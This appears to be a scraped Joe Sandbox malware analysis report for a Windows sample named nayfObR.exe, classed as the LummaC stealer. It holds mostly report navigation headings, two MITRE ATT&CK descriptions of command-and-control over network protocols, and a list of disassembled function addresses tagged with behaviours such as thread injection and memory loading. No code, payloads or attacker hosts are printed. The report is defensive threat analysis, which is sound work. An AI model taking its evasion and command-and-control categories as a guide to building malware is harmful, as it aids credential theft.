Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nayfObR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
nayfObR.exe

Function 005D019E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 005A1CF0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Function 005A2350 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54
libraryloadersynchronizationCOMMON

Function 005B5F42 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 005B672A Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Function 005A2050 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Function 005AEE63 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 005BCCA4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 005B6BA8 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 005BD47D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 005B6A92 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 005B5DF3 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Function 005A22B0 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre